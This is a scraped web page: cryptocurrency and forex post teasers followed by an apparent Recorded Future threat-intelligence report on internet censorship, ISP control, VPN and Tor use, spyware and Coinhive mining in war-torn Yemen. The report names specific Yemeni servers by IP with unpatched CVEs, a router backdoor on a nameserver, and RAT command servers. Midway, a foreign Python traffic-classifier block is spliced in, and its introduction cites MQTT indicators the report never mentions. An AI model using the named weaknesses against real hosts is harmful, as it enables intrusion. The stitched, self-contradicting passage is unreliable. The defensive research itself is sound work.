By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets In early November, we commented on GM, arguing that the stock may reach $40. Not much time has passed, and yet many key events occurred, which increased the volatility in General Motors’ stock. Currently, any major rise is unlikely, as Donald Trump is now taking part in this. […]

The post General Motors Fires 27,000 People, Stock Jumps by 5% appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Struggle to Gain Momentum as Sellers Remain in Control

Despite the recovery during the weekend, the major cryptocurrencies failed to gain substantial ground, with even the relatively stronger coins getting stuck below their recent short-term swing highs. Most of the top coins are now back below their initial panic lows, and despite the recent stability and the strength in some of the coins, the […]

The post Crypto Update: Coins Struggle to Gain Momentum as Sellers Remain in Control appeared first on Hacked: Hacking Finance.

Tron Price Analysis: Despite Hard Fall, TRX/USD Forming a Bullish Flag Pattern

The TRX/USD price is under pressure after the big 48% bull run seen last week. Justin Sun goes head to head with Ethereum’s Vitalik Buterin, boasting of huge transaction volume. Tron Ecosystem Growth Tron continues to see solid growth, with data to back it up. The foundation’s Dapp ecosystem is expanding in a strong and […]

The post Tron Price Analysis: Despite Hard Fall, TRX/USD Forming a Bullish Flag Pattern appeared first on Hacked: Hacking Finance.

Pound Still Sensitive to Brexit Talks

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets The hardest times are ahead of the British Pound. On December 11th, there will be a vote in the British Houses of Parliament on the Brexit agreement with the European Union and the results will directly influence the entire exit strategy – i.e., “hard” or “soft”. The “soft” […]

The post Pound Still Sensitive to Brexit Talks appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: Is this a Bottoming or Set-up for Another Deep Drop?

ETH/USD price does not appear to be out of danger yet, given current technical set up possibilities. For greater buying pressure to be seen, the bulls must break $130 to the upside. ETH/USD price action continues to show little signs of commitment, from either the bear or bull camps. Since the hard selling from 7th […]

The post Ethereum Price Analysis: Is this a Bottoming or Set-up for Another Deep Drop? appeared first on Hacked: Hacking Finance.

Crypto Update: Bitcoin Leads Weekend Recovery as Consolidation Continues

The major cryptocurrencies started the weekend in a positive fashion, recovering from yesterday’s selloff and stabilizing the short-term technical patterns. The current consolidation kept the possible failed breakdown formation in play in the case of the relatively stronger coins, such as Bitcoin and Litecoin, and although the bearish long-term picture is still not in any […]

The post Crypto Update: Bitcoin Leads Weekend Recovery as Consolidation Continues appeared first on Hacked: Hacking Finance.

Forex Analysis and Chartbook: Euro Plunges as Markets Turn Choppy Ahead of G20 Summit

Friday Market Snapshot Asset Current Value Daily Change S&P 500 2,752 0.36% DAX 30 11,257 -0.36% WTI Crude Oil 50.62 -1.25% GOLD 1,220 -0.29% Bitcoin 3,967 -6.63% EUR/USD 1.1311 -0.71% Traditional financial markets turned as choppy as expected ahead of the event that could shape the coming months in most asset classes. The […]

The post Forex Analysis and Chartbook: Euro Plunges as Markets Turn Choppy Ahead of G20 Summit appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Pull Back Following Strongest Rally in Weeks

The cryptocurrency segment is seeing red once again today following the strongest rally attempt since the structural breakdown in Bitcoin, which led to a damaging leg lower in the ongoing bear market. The major coins have all pulled back from their recent swing highs, and most of them dipped back below last week’s initial panic […]

The post Crypto Update: Coins Pull Back Following Strongest Rally in Weeks appeared first on Hacked: Hacking Finance.

Stellar Price Analysis: XLM Overtakes Bitcoin Cash After 25% Bull Run

XLM sees ‘flippening’ of Bitcoin Cash, moving to the fourth largest coin by market cap. Bull run cools after running into a new area of resistance around the former demand zone. The XLM/USD pair between the 27-29th November was making strong progress to the upside, having gained a chunky 25% within that period. This came […]

The post Stellar Price Analysis: XLM Overtakes Bitcoin Cash After 25% Bull Run appeared first on Hacked: Hacking Finance.

Litecoin Update: Good Time to Accumulate

The 2018 bear market has devalued many altcoins by over 70%. Litecoin (LTC/BTC) is part of that list. From the 2018 high of 0.025, the market dropped by as much as 71.78% as of November 19 when it touched a low of 0.007055. At that point, it looked like the market has more room to […]

The post Litecoin Update: Good Time to Accumulate appeared first on Hacked: Hacking Finance.

Tron Price Analysis: TRON to Launch Gaming Fund Worth $100 Million; TRX/USD Cools from Recent Surge

The Tron foundation are set to launch a $100 million gaming fund, ‘Tron Arcade’. TRX/USD bulls have run out of steam for now, after entering into a new area of resistance. TRX/USD has been a huge out-performer of late, having racked up 50% worth of gains. The rally of the price began after a […]

The post Tron Price Analysis: TRON to Launch Gaming Fund Worth $100 Million; TRX/USD Cools from Recent Surge appeared first on Hacked: Hacking Finance.

Pre-Market Analysis And Chartbook: Commodities Gain, Dollar Declines Following Powell’s Dovish Shift

Thursday Market Snapshot Asset Current Value Daily Change S&P 500 2,739 -0.09% DAX 30 11,298 -0.01% WTI Crude Oil 52.14 3.65% GOLD 1,223 0.20% Bitcoin 4,253 0.75% EUR/USD 1.1374 0.08% We are having another tumultuous day in financial markets, with risk assets trading without a clear direction after yesterday’s surge in US stocks. Fed Chair […]

The post Pre-Market Analysis And Chartbook: Commodities Gain, Dollar Declines Following Powell’s Dovish Shift appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD Pulls Back for the Potential of Greater Upside

XRP/USD cooled marginally on Thursday to make way for a further bull run. The price completed a technical move, breaking out and then retesting a pennant structure. XRP/USD cooled during the session on Thursday, after a decent run of gains seen in the week so far. The price was seen down a marginal 3%, […]

The post XRP Price Analysis: XRP/USD Pulls Back for the Potential of Greater Upside appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Extend Bounce as Selling Pressure Eases

The top cryptocurrencies continue to trade with a bullish short-term bias, and thanks to the two-day rally, the technical picture improved across the board. The odds of a failed breakdown pattern increased in the segment, with Bitcoin clearly recovering above the prior low, joining Litecoin in the move, even as most of the major altcoins […]

The post Crypto Update: Coins Extend Bounce as Selling Pressure Eases appeared first on Hacked: Hacking Finance.

Zcash Price Analysis: ZEC/USD Jumps 30% in Recovery as Foundation Teases Reference Wallet Design

ZEC/USD bulls are making a strong case for recovery, as price makes 30% advance. Zcash foundation teases the design concepts of its awaited reference wallet. ZEC/USD is on a strong road to recovery following the latest bottom. The price has gained over 30% after the sellers became very much exhausted. A drop of around […]

The post Zcash Price Analysis: ZEC/USD Jumps 30% in Recovery as Foundation Teases Reference Wallet Design appeared first on Hacked: Hacking Finance.

Bitcoin Had a Big 15% Bounce to $4,300 But Traders Aren’t Convinced of Bull Run

Over the past 24 hours, the price of Bitcoin (BTC) surged from $3,771 to $4,355, by more than 15.4 percent, against the U.S. dollar. The volume of the dominant cryptocurrency spiked from around $5 billion to $7.2 billion, as large buy orders were filled by major fiat-to-cryptocurrency exchanges like Coinbase and Bitstamp. Bitcoin recorded the […]

The post Bitcoin Had a Big 15% Bounce to $4,300 But Traders Aren’t Convinced of Bull Run appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: ETH/USD Bullish Breakout from Descending Channel

The ETH/USD bulls forced a breakout to the upside from a descending channel formation. The next barrier is eyed within the $130 territory, further north eyes would be on $150. ETH/USD is on its way to the north following a convincing recovery on Wednesday. This comes after a bottom had formed ahead of the big […]

The post Ethereum Price Analysis: ETH/USD Bullish Breakout from Descending Channel appeared first on Hacked: Hacking Finance.

Pre-Market Analysis and Chartbook: US Stocks Remain Stable Ahead of Key Events

Wednesday Market Snapshot Asset Current Value Daily Change S&P 500 2,687 0.06% DAX 30 11,300 -0.07% WTI Crude Oil 51.09 -1.92% GOLD 1,213 -0.13% Bitcoin 4,194 11.28% EUR/USD 1.1276 -0.09% Financial markets are mixed with a slight positive bias amid the continued trade confusion, with investors trying to guess the likelihood of, at least, a […]

The post Pre-Market Analysis and Chartbook: US Stocks Remain Stable Ahead of Key Events appeared first on Hacked: Hacking Finance.

Bitcoin Gold Update: Shows Profit Potential

Just like many altcoins, Bitcoin Gold (BTG/BTC) was in a downtrend for most of 2018. It generated a 2018 high of 0.0317 on January 13. From there, the market got trapped in a brutal downward spiral. It nosedived to as low as 0.002336 on August 14. At that point, Bitcoin Gold was down by over […]

The post Bitcoin Gold Update: Shows Profit Potential appeared first on Hacked: Hacking Finance.

Underlying Dimensions of Yemen’s Civil War: Control of the Internet

Insikt Group

Scope Note: Sources of this research include the Recorded Future platform, Recorded Future malware detonation, the findings and methods from the Citizen Lab, Shodan, VirusTotal, Censys, ReversingLabs, and third-party metadata. Recorded Future would like to thank Rapid7 and their National Exposure Index in helping quantify the current IP landscape in Yemen. Recorded Future would also like to thank Joe Sandbox for the use of their product to analyze Android device malware samples.

Executive Summary

In the midst of the ongoing Yemeni civil war, local and international players are waging a secondary war through internet control and other cyber means. Recorded Future’s Insikt Group assesses that dynamics of the Yemeni civil war are manifesting themselves online through a struggle over Yemeni access, use, and control of the internet. Recorded Future identified both censorship controls and traffic attempting to subvert those controls within Yemen, as well as spyware activity. This report intends to establish a baseline of internet activity, use, and access in Yemen.

Key Judgments

  • Since taking Yemen’s capital, Sana’a, in September 2014, the Houthi rebels have supervised the main ISP, YemenNet, along with the access controls and censorship tools previously used to disrupt, degrade, or monitor internet activity, for the last three years.
  • Recorded Future assesses with medium confidence that the Houthi rebels within Sana’a are taking advantage of YemenNet’s vast IP infrastructure to host Coinhive mining services to generate revenue.
  • While official government sites hosted on YemenNet and the .ye domain space have been changed to reflect the Houthi government in Sana’a, rather than the Hadi government in Aden, Recorded Future has noted some vulnerabilities within YemenNet’s main name server and multiple servers that, until recently, hosted over 500 official .ye domains.
  • The Hadi government, now in Aden instead of Sana’a, produced a new ISP, AdenNet, in June 2018. We believe this could lead to new internet resiliency within the country as internet subscriptions and mobile subscriptions continue to rise.
  • A small percentage of internet users in Yemen are using either VPNs, Tor, or routers with DNS recursion to circumvent government controls.
  • Suspicious internet-related activity out of Yemen suggests low levels of adware and spyware, but information as to the actors behind it is inconclusive.
  • Major international players, including the United States, Russia, and China, are using malware, military activity, political leverage, and investments to further their interests in the Saudi-Iranian regional conflict for hegemony within Yemen.

Infographic

Graphical representation of this analysis.

Background

Yemen has been embroiled in an ongoing civil war since 2015. The conflict is fueled by sectarian, religious, and political divides, as Yemen is relatively multicultural compared to the rest of the Arabian Peninsula. The Yemenis have endured multiple civil wars, including a conflict in Northern Yemen from 1962 to 1970, and a bloody war in 1994 after resisting the country’s 1990 unification. For all of its internal struggles, Ali Abdullah Saleh, a former president of Yemen, described governing the country as akin to “dancing on the heads of snakes.”

The current civil war traces back to a series of bloody protests, spurred on by the Arab Spring, that caused President Ali Abdullah Saleh to resign from power in 2011. This placed the vice president, Abdrabbuh Mansur Hadi, in power in a difficult situation, mandated to form a unified government in Yemen. Hadi ultimately failed to unify the country, leaving it largely ungoverned. The lack of control led to a power vacuum that allowed the growth of rebellious factions, competing foreign-backed governments, and the festering issue of extremism.

The Zaidi Shia Houthis are largely considered to be the rebellious faction, and are backed and supplied by the Iranian regime. The faction was formed from members of Yemen’s military previously loyal to Saleh before he turned on his own faction and was subsequently killed in 2017. The faction fights the Saudi-backed Abdrabbuh Mansur Hadi government, which currently claims political control of Yemen and is the internationally recognized government of Yemen. This fuels sectarian tensions, as the Hadi government supporters are largely Sunni Muslims, as opposed to the Houthis, who are majority Shia. The United Arab Emirates funds a third group of southern separatists — a splinter group of the Southern Movement that has been actively trying to secede from Yemen since 2007. The group hopes to reestablish the borders from 1990, when the previously separate North Yemen and South Yemen were united to form one country. The Southern Movement is also predominantly Shia. These groups largely represent the different demographics within Yemen’s borders.

Additionally, remnants of Al-Qaeda in the Arabian Peninsula (AQAP) continue to hold large pockets of territory in the center of the country. AQAP is one of Al-Qaeda’s most prominent affiliates, taking credit for lone wolf attacks on Fort Hood, Little Rock, the USS Cole, and the failed airplane bombing in Detroit, as well as a jailbreak in Yemen. The group attempted a rebranding in 2011 as Ansar al-Sharia and began to focus on holding territory in Yemen. The group has predominantly operated as a militia and terror organization targeting Houthi installations in recent years. A similar affiliate model was attempted by the Islamic State, which largely failed to gain traction. The recent reporting of the Islamic State within Yemen surrounds skirmishes between AQAP and IS.

Yemen, as a battlefield, is an interesting microcosm of regional and global powers attempting to project their power and manifest their interests. The Yemeni civil war lies at the center of the Iranian and Saudi proxy battle for regional hegemony. Houthi-held territory has been targeted by Saudi Arabia’s Operation Decisive Storm, an airstrike campaign which the United Nations claims continues to kill non-combatants. The Iranian campaign, according to the U.S. military, has introduced weapons that have allowed the Houthis to interdict shipping routes in the Bab al-Mandeb strait. As tensions rise between the United States and Iran, Iran has the ability to control the Strait of Hormuz across the peninsula and has threatened a blockade if it perceives the United States has been too aggressive. Recorded Future has reported on Iran and Saudi Arabia’s cyber conflict within Yemen previously in 2015, when the Yemen Cyber Army emerged as a patriotic hacking group attacking Saudi government agencies. The group has since been linked to Iran.

This regional conflict coincides with conflicting Russian and American interests in the Arabian Peninsula and the region’s sea lanes. The United States has also led an active campaign to rid the region of the presence of the Islamic State (IS) and Al-Qaeda, finding success against IS but at the expense of civilian deaths in airstrikes and costly special operation campaigns. Conversely, the Jamestown Foundation has speculated that Russia has deployed private military contractors to Yemen to oversee a political solution to the war. The Carnegie Endowment believes that Russia is involved with the goal of expanding its influence and projecting power in the Red Sea.

China has also increased its interest in the stability of the peninsula and has aligned itself with the Hadi government and its Saudi-backed forces since approximately 2017. While China and the Saudi Arabian government have pre-existing defense ties, a resolution to the conflict in Yemen would help reduce the risk to Chinese shipping around the Bab al-Mandeb strait and the surrounding area. The strait is a key transit route for China’s Belt and Road Initiative — a massive series of infrastructure projects designed to project Chinese national power — into Saudi Arabia and the wider Middle Eastern region.

Infrastructure

The internet infrastructure in Yemen is reflective of the international powers at play in the nation. The ongoing conflict has stunted the assignment of internet space, as well as the ability of citizens to access the internet. Rapid7’s National Exposure Index found that although Yemeni ASNs have allocated 135,168 IP addresses, only 17,934 addresses were assigned, indicating low usage. According to DomainTools, there have only been 1152 .ye domains registered (.ye is controlled by YemenNet). People self-reporting as being from Yemen have registered 7,845 domains, the most popular of which is .com. The fourth most popular TLD is .ye. Yemen ranks 50th globally in population, but 148th in domain registrations.

As territory has changed hands in Yemen for the last four years, so too has control over internet resources. As the Houthi forces seized the capital city of Sana’a, they also gained control over YemenNet — the major internet provider to Yemen. YemenNet is prone to outages and was previously disrupted by both cyber and physical means.

Submarine Cables

There are four submarine cables servicing Yemen at three landing points. As shown in the image below, the FALCON submarine cable has landing points at Al-Ghaydah and Al-Hudaydah, and SEA-ME-WE 5 also has a landing point at Al-Hudaydah, while AAE-1 and Aden-Djibouti have landing points at Aden.

Under Houthi control, TeleYemen (and therefore YemenNet) makes use of the submarine cables for routing traffic, most likely to avoid routing through the fiber-optic connections provided by Saudi Telecom. Currently, YemenNet peers with Reliance Globalcom, Cogent Communications, Omantel, and PCCW Global — all partners in the Asia Africa Europe-1 (AAE-1) submarine cable, which has a landing point in Aden. AdenNet, on the other hand, primarily makes use of the overland fiber-optic cables provided by Saudi Telecom.

Two of the three submarine landing points in Yemen are currently under the control of the Hadi government. The third, in Al-Hudaydah, is currently under the control of the Houthi rebels, but as shown in the image below, is an area that the Hadi government has been aggressively targeting. The port in Al-Hudaydah is critical for the delivery of food and medical supplies to a nation that is experiencing famine and a cholera outbreak. If the Hadi government forces take control of the port, they could cut off internet access between the outside world and YemenNet subscribers. While not as critical as the humanitarian crisis currently impacting Yemen, lack of internet access would make it more challenging to understand what is happening within the country.

Access and Censorship

In 2015, the Citizen Lab reported that the Yemeni government was censoring content for Yemeni citizens on YemenNet, its only national ISP with control over the .ye namespace. Much of the IP and domain space used in YemenNet is filtered through two caching servers, cache0.yemen.net[.]ye and cache1.yemen.net[.]ye. This may allow for content monitoring or interdiction of traffic. Recorded Future found remnants of that effort via Shodan, with a single NetSweeper device, a tool for web content filtering, installed on the IP 82.114.160.98. The IP used a self-signed SSL certificate, but Recorded Future could not identify any traffic going to or from that IP address. No other similar censorship or access control devices were found via Shodan or Censys.

Geographic Breakdown

Geographic breakdown of internet access and territory control. Source: Created from Al Jazeera, Reuters, World Energy Atlas, and Critical Threats (November 2018).

After taking over Yemen’s capital Sana’a in September 2014, the Houthi rebels gained control over YemenNet, TeleYemen, and all other telecom providers based within the city. In June 2018, they also seized control of the dominant mobile provider, MTN Yemen. Thus, the Houthi rebels now have access to the same access control and censorship tools previously used to disrupt or monitor internet activity, which may come online or offline depending on the physical safety of the operators running the boxes. According to reports from Al Arabiya, the Houthis have blocked access to WhatsApp, Facebook, Twitter, and Telegram, along with domains that reported on Houthi troop movements, and it is likely that they used these controls to do so.

Recorded Future Timeline

Timeline of Yemeni internet activity and prominent airstrike operations.

The Houthis have also taken steps to shut off internet access entirely across the ISPs they control. On December 7, 2017, the Houthi-controlled Ministry of Communications and Information Technology initiated a 30-minute shutdown of the internet. Previously, the Houthis have disabled internet access to the port city of Aden. Numerous reports found that the Houthis severed over 80 percent of the fiber optic lines from YemenNet, taking a more brutish approach to controlling information across the country.

Internet Service Provider IP Holdings

Major internet service provider IP holdings.

Forced to flee the capital, the Hadi government established a base of operations in Aden. The new base also required internet access, and rather than cede secrets or money to the Houthi-controlled YemenNet or be at the mercy of the Houthi government repeatedly cutting off access, the Hadi regime stood up AdenNet, a new backbone provider, in June 2018. The new ISP was funded by the United Arab Emirates (UAE), uses a single flow from Saudi Telecom (AS39386), and was built using routers from Chinese technology firm Huawei. Huawei is a corporation with extremely close ties to the Chinese government and military and has been banned from government use in the United States and Australia due to espionage concerns.

Much of AdenNet’s infrastructure is located outside of Yemen. The AdenNet website www.adennet4g[.]net was registered through GoDaddy on June 20, 2018, and is hosted at Bluehost, as is the AdenNet mail server (mail.adennet4g.net). Both hosts have the same IP address, 162.241.226.169, which according to Recorded Future research is shared by 886 other domains. Customer service functions, such as the self-service portal ssp.adennet4g[.]net, do make use of assigned AdenNet IP space.

The use of the .net gTLD for AdenNet and outside infrastructure may reflect the reluctance of the Hadi regime to use Houthi-controlled resources. It could also be indicative of the challenges that come with trying to build out new internet infrastructure, especially in the middle of a war zone. Earlier reports suggested that President Hadi is attempting to regain control of the .ye ccTLD, as well as the AS30873 and AS12486 ASNs. A review of documents at ICANN, IANA, and RIPE indicates that, as of this report, no formal process has been started. In addition, the likelihood of control of these resources being transferred by internet-governing bodies in the middle of a civil war is very low.

Baselining Internet Activity

Airstrikes and food shortages during the Yemeni civil war have left 18 million people in need of humanitarian assistance and have created a food emergency. However, internet activity from the country has not decreased during the war. According to the CIA World Factbook, internet users have risen from 19.1 percent of the population before the war in 2014 to 24.6 percent in 2016. Internet World Stats also claims that internet users have stayed roughly the same over the past two years, hovering at 24.3 percent in 2018. Additionally, multiple sources claim that cell phone penetration has been above 50 percent since before the country’s civil war and has either stayed roughly the same or grown over the last four years.

There is evidence of five different groups of users utilizing internet services within Yemen. The Houthi rebels used their control of YemenNet and the .ye domain space after taking Sana’a, and government websites reflect the current Houthi government within the capital. For example, the website of Yemen’s Ministry of Foreign Affairs contains an up-to-date list of the current Houthi-led ministry. Additionally, with the creation of AdenNet, the Hadi government will likely be using internet services more frequently.

Ministry of Foreign Affairs Website

Screenshot of Yemen’s Houthi-led Ministry of Foreign Affairs website under the domain mofa.gov[.]ye.

Universities also still have access to the internet within the country, and university students are still using internet services to conduct research, communicate with each other, and browse the web. However, this is becoming an increasingly smaller source of traffic as universities are gradually being targeted in airstrikes and bombing attacks by both Houthi and Hadi-led factions, causing university enrollment to decrease. Additionally, universities in the country are increasingly being repurposed as detention centers, which is likely another reason for a drop in university internet usage.

A disproportionately large number of home and business users in Yemen have enabled DNS recursion on their routers, which allows these routers to act as a caching DNS server for the users behind the router. According to Shodan, there are more than 12,000 customer premise equipment (CPE) routers with DNS recursion enabled. It is possible that this is being done to bypass the reported draconian censorship enforced by the Houthis — as mentioned earlier, they are reportedly using Netsweeper, a tool that uses a combination of web and DNS filtering, to block content deemed objectionable.

For comparison, the countries of Mozambique and Ghana, which have similar population sizes to Yemen, only report around 670 and 1200 open DNS servers in Shodan, respectively.

Yemeni Traffic Destinations

Breakdown of Yemeni traffic destinations to OpenVPN endpoints, according to third-party metadata.

Finally, multiple sources have suggested that Yemeni citizens have used either Tor Browser or VPNs to get around Yemeni internet shutdowns and censorship. This user group would likely be accessing sources that are not sanctioned by either the Houthi-led rebels (who temporarily shut down the internet across the entire country on December 7, 2017) or the Hadi government, which has a history of blocking various social media outlets. Recorded Future found evidence of VPN and Tor usage from Yemen during October 2018. Small amounts of traffic from multiple AdenNet IPs were attempting to access non-Yemeni IPs that had open ports 9001 (Tor), 1194 (OpenVPN), or 110 (IPSEC VPN tunneling).

Yemeni Traffic Destinations

Breakdown of Yemeni traffic destinations to Tor endpoints, according to third-party metadata.

Quantifying Internet Use in Hadi-Controlled Yemen

AdenNet is much smaller than the now Houthi-controlled YemenNet. To assess the types of traffic that were coming from the ISP, Recorded Future conducted metadata analysis from October 1, 2018, to November 6, 2018. Recorded Future chose to monitor AdenNet because of its recent creation, and because it is under the control of the Hadi government, making the analysis of this ISP useful to gain insight into what is occurring in Hadi-controlled Yemen. Although most major cities within Yemen have been hit by bombings since the creation of AdenNet in June 2018, both YemenNet and AdenNet seem to be functioning without much issue, based on traffic between the two ISPs and the publicly known YemenNet hosts online.

Recorded Future Map

Recorded Future map of airstrikes or bombings in Yemen since June 2018.

Top Ports and Protocols: Web Browsing and VPNs

Most of the activity we observed during our analysis of the Yemeni internet, somewhat unsurprisingly, was web browsing activity over HTTP or HTTPS. In addition, we also identified sporadic DNS, POP3, SMTP, and IMAP activity. We observed some IPSEC tunneling activity utilizing the Encapsulating Security Payload (ESP) protocol, which is indicative of VPN application use. This could be further evidence of Yemeni users attempting to circumvent either government’s internet controls in order to get online. Other activity included the use of the administrative protocols TELNET and SSH, and of the network news transfer protocol (NNTP), one of the internet’s oldest protocols, which transfers news articles between the servers of the USENET newsgroup world. Finally, evidence of BitTorrent and online gaming activity, as well as the possible use of XMPP messaging applications such as Jabber, was also found.
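The port-and-protocol breakdown described above (and the Tor, OpenVPN, ESP and MQTT indicators mentioned elsewhere in this report) can be reproduced over flow metadata with a small classifier. This is an added example, not Recorded Future's own tooling: the flow records are constructed in RFC 5737 documentation address ranges, and the XMPP (5222) and BitTorrent (6881) ports are conventional values assumed here rather than taken from the report.

```python
"""Classify flow records by destination port / IP protocol and summarize
how much of the traffic looks like tunnelling (Tor, OpenVPN, IPsec ESP).

Added example; not Recorded Future's analysis code. Sample flows below are
constructed (RFC 5737 documentation ranges), not observed traffic.
"""
from collections import Counter

# IANA IP protocol numbers.
PROTO_TCP, PROTO_UDP, PROTO_ESP = 6, 17, 50

# (protocol, destination port) -> service label. Ports named in the report
# (80/443 web, 53 DNS, mail, 23/22 admin, 119 NNTP, 9001 Tor, 1194 OpenVPN,
# 1883/8883 MQTT) plus two assumed conventional ports (5222 XMPP, 6881 BitTorrent).
PORT_LABELS = {
    (PROTO_TCP, 80): "HTTP",
    (PROTO_TCP, 443): "HTTPS",
    (PROTO_UDP, 53): "DNS",
    (PROTO_TCP, 53): "DNS",
    (PROTO_TCP, 25): "SMTP",
    (PROTO_TCP, 110): "POP3",
    (PROTO_TCP, 143): "IMAP",
    (PROTO_TCP, 23): "TELNET",
    (PROTO_TCP, 22): "SSH",
    (PROTO_TCP, 119): "NNTP",
    (PROTO_TCP, 9001): "Tor ORPort",
    (PROTO_TCP, 1194): "OpenVPN",
    (PROTO_UDP, 1194): "OpenVPN",
    (PROTO_TCP, 1883): "MQTT",
    (PROTO_TCP, 8883): "MQTT/TLS",
    (PROTO_TCP, 5222): "XMPP",        # assumed conventional port
    (PROTO_TCP, 6881): "BitTorrent",  # assumed conventional port
}

# Labels treated as VPN / circumvention tunnelling in the summary.
TUNNEL_LABELS = {"Tor ORPort", "OpenVPN", "IPsec ESP"}

# Constructed flow records: src,dst,proto,dport ('-' = no port, e.g. ESP).
SAMPLE_FLOWS = """\
# src,dst,proto,dport  (constructed sample, RFC 5737 ranges)
192.0.2.10,198.51.100.5,6,443
192.0.2.10,198.51.100.5,6,80
192.0.2.11,198.51.100.9,17,53
192.0.2.12,203.0.113.7,6,9001
192.0.2.12,203.0.113.8,17,1194
192.0.2.13,203.0.113.20,50,-
192.0.2.14,198.51.100.30,6,110
192.0.2.14,198.51.100.30,6,25
192.0.2.15,198.51.100.40,6,119
192.0.2.16,203.0.113.50,6,1883
192.0.2.17,198.51.100.60,6,6881
192.0.2.18,198.51.100.70,6,12345
"""


def parse_flow(line):
    """Parse one 'src,dst,proto,dport' record into a dict."""
    src, dst, proto, dport = (field.strip() for field in line.split(","))
    return {"src": src, "dst": dst, "proto": int(proto),
            "dport": None if dport == "-" else int(dport)}


def label_flow(flow):
    """Map a flow to a service label; ESP has no ports, so check it first."""
    if flow["proto"] == PROTO_ESP:
        return "IPsec ESP"
    return PORT_LABELS.get((flow["proto"], flow["dport"]), "other")


def summarize(lines):
    """Return (Counter of labels, set of source IPs seen tunnelling)."""
    counts = Counter()
    tunnel_sources = set()
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # skip blank lines and comments
        flow = parse_flow(line)
        label = label_flow(flow)
        counts[label] += 1
        if label in TUNNEL_LABELS:
            tunnel_sources.add(flow["src"])
    return counts, tunnel_sources


def tunnel_share(counts):
    """Fraction of all flows whose label is a tunnelling protocol."""
    total = sum(counts.values())
    if total == 0:
        return 0.0
    return sum(counts[label] for label in TUNNEL_LABELS) / total


if __name__ == "__main__":
    counts, sources = summarize(SAMPLE_FLOWS.splitlines())
    for label, n in counts.most_common():
        print(f"{label:12s} {n}")
    print(f"tunnelling share: {tunnel_share(counts):.0%}, sources: {sorted(sources)}")
```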

Because most of the traffic we observed was web browsing activity, it is no surprise that most traffic originating from AdenNet IPs within the Recorded Future dataset was headed toward large hosting sites and content distribution network (CDN) providers like Highwinds, Amazon, and Akamai. What is surprising is the distribution between Western and Chinese-owned hosts. Alibaba and Tencent hosting services, while not as frequently accessed as their Western counterparts, still show up as a sizable percentage of Yemeni internet traffic.

Suspicious Internet Activity

Internet Infrastructure Vulnerabilities

Recorded Future has found multiple instances of suspicious activity within and originating from Yemen’s internet infrastructure. For one, AdenNet does not seem to be the first time that Yemen has entrusted a Chinese company with its backbone internet infrastructure. Recorded Future’s Shodan integration shows that the IP for one of the main nameservers in YemenNet, ns1.yemen.net[.]ye, contains a “tenda-backdoor” module. While this module is no longer searchable in Shodan, the tenda-backdoor module refers to a firmware backdoor using vulnerability CVE-2017-16923 to conduct remote command execution in router models made by Chinese network manufacturer Tenda.

It is uncertain whether or not this was an intentional vendor backdoor or an accidental one. If the name server is connected to other infrastructure within YemenNet, which it is likely to be, both state and non-state attackers could leverage this backdoor to infiltrate the ISP.

Recorded Future Shodan Extension

Screenshot of the Recorded Future Shodan extension for ns1.yemen.net[.]ye.

Additionally, Houthi-controlled servers 82.114.162.66 and 82.114.162.10 that, up until June 2018, hosted upwards of 500 Yemeni government, educational, and corporate websites, are riddled with old vulnerabilities like CVE-2003-1582, CVE-2009-2521, CVE-2008-1446, and other older issues that, if left unpatched, could allow attackers easy access into said systems. Even though many of the original websites are no longer hosted on these servers, it is entirely possible that old system logs and data remain.

PassiveTotal Domain Results

Screenshot of PassiveTotal domain results for the IP 82.114.162[.]66 on given days in 2018. Source: PassiveTotal.

Command and Control Servers

Recorded Future’s collections, in conjunction with Shodan, identified a number of basic command and control servers exposed in Yemeni ranges running remote access trojans. These included the Bozok, DarkComet, and NetBus trojans.

Malware Samples

Recorded Future noted a significant increase in the number of malicious samples submitted to VirusTotal, from 13 samples between 2015 and 2017 to a total of 164 samples in 2018. The cause remains unclear. This may be due to the introduction of AdenNet, as internet access becomes more consistently available to more citizens and residents of Yemen; however, it may also be due to increased threat activity.

Of these samples, approximately half were malicious, and the overwhelming majority of those malicious samples were Android applications. From the 84 Android samples uploaded to VirusTotal since 2015, Recorded Future was able to use Joe Sandbox to identify variants of widely disseminated malware families, including AhMyth, DroidJack, Hiddad, and Dianjin, as well as multiple fake Altcoin wallets, fake Whatsapp applications, and spyware posing as antivirus, video playing, and VPN applications. In addition, Recorded Future used Joe Sandbox dynamic analysis and Recorded Future malware detonation to determine that 50 percent of the adware obtained from the Android samples reached out to both Chinese and Western advertisement sites. Two-thirds of the fake antivirus spyware apps, as well as some AhMyth samples found, connected to Chinese IPs.

Most applications within the VirusTotal dataset appear to be low-level fake applications serving adware. However, some spyware from the dataset has been packed with JiaGuBao, a commercial packer from China. Additionally, the fake antivirus spyware reaching out to Chinese IPs accesses information from Android phones including old emails, SMS and call logs, and browser history. It likely uses accessibility services to control other installed applications and has the capability to change Wi-Fi configuration, start services while the phone screen is off, take photos, and delete other packages. There is no doubt that China is interested in the outcome of the civil war in Yemen both from a commercial and diplomatic perspective. However, while some of the malware reaching out to Chinese IPs align with possible Chinese surveillance interests, Recorded Future was unable to determine whether any malware obtained was from a Chinese nation-state espionage campaign. In addition, Recorded Future uncovered several Chinese mobile apps that requested extensive Android phone permissions being used by individuals in Yemen. Because these applications are currently only available on Chinese app stores, it is unlikely that the apps were being used by native Yemenis, but rather, Yemen-based Chinese nationals likely stationed in Yemen for capacity building purposes. Chinese companies, including Huawei, have sent Chinese workers to foreign countries in the past when constructing infrastructure projects. Chinese nationals would likely download applications tailored to them while in Yemen.

Coin Mining Activity

Finally, Recorded Future found 973 hosts within Yemen running cryptocurrency mining service Coinhive. Coinhive, a JavaScript-based Monero miner, was released in early 2017, two years after the Houthi rebels took control of YemenNet. It is usually embedded into websites and utilizes a user’s CPU or processing power to mine cryptocurrency for the benefit of the website’s owner. This will often lock a user’s browser and drain the user’s device battery for as long as the user is browsing the site. All 973 hosts belong to the YemenNet ASN AS30873, and 213 of the hosts share the same domain, dynamic.yemennet[.]ye.

